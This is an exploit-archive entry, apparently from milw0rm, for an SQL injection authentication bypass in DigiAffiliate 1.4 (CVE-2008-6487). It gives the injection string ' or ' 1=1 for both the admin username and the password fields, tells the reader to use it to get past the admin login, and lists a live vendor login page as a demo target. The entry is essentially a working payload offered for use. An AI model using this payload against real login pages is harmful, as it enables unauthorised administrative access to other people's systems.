DigiAffiliate 1.4 - Authentication Bypass

Author: d3b4g
type: webapps
platform: asp
port: 
date_added: 2008-11-07 
date_updated: 2017-01-02 
verified: 1 
codes: OSVDB-52809;CVE-2008-6487 
tags: 
aliases:  
screenshot_url:  
application_url: 

###############################################################################################
[-] DigiAffiliate <= V1.4 (Auth bypass) SQL Injection Vulnerability
[-] Discovered By : d3b4gd
[-] Greetz : All my freind
################################################################################################
Use these information to bypass adminlogin

admin :   ' or ' 1=1
password: ' or ' 1=1

Live demo :

http://www.digiappz.com/digiaffiliate2/login.asp
--------------------------------------------
--------------------------------------------

# milw0rm.com [2008-11-08]